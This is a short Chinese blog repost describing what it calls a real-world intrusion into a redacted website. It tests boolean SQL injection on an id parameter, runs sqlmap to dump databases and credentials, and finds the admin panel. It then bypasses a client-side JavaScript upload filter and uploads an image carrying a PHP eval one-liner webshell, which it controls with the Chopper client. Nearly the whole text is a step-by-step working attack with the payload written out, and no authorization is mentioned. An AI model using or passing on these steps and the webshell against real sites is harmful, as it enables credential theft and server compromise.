记录一次实战,注入+本地JS绕过拿shell
2022-11-28 09:49:27 Author: 系统安全运维(查看原文) 阅读量:19 收藏

文章来源:CSDN博客(Randmancy)

原文地址:

https://blog.csdn.net/qq_34341458/article/details/113845203

正文
1.找注入点
2.测试是否有注入:
http://xxxxxx/xxxx.php?id=6’ ,没有回显
输入:http://xxxxxx/xxxx.php?id=6 and 1=1 有回显,and 1 = 2没有回显,说明存在注入。
3. 使用sqlmap跑。
sqlmap.py -u “http://xxxxx/xxxx.php?id=6”
发现有注入,然后使用–dbs,–tables,–columns,–dump找出用户名和密码。
4.使用御剑扫描后台。然后进行登录。
我们先上传一个脚本木马试试。
发现有黑名单。先看下是否是本地js校验。右键审查元素,发现是本地js校验。
我们找到表单form,删除相对应的脚本。
5.重新上传php一句话,发现
那么试下图片马
6.将图片使用C32Asm打开,在最后面添加一句话:<?php @ eval ( $_POST [ 'pw' ]); ?>
保存,命名为a.php。然后上传,发现上传成功,使用菜刀连接,密码pw。
如有侵权,请联系删除

好文推荐

红队打点评估工具推荐
干货|红队项目日常渗透笔记
实战|后台getshell+提权一把梭
一款漏洞查找器(挖漏洞的有力工具)
神兵利器 | 附下载 · 红队信息搜集扫描打点利器
神兵利器 | 分享 直接上手就用的内存马(附下载)
推荐一款自动向hackerone发送漏洞报告的扫描器
欢迎关注 系统安全运维

文章来源: http://mp.weixin.qq.com/s?__biz=Mzk0NjE0NDc5OQ==&mid=2247512777&idx=2&sn=8b1a9fb5d55b367287b6698148d50a97&chksm=c30861b9f47fe8afac93b1e5e524ca62bf9dde76ba1dca07025f74a70c2fcf449cd46ce75b0a#rd
如有侵权请联系:admin#unsafe.sh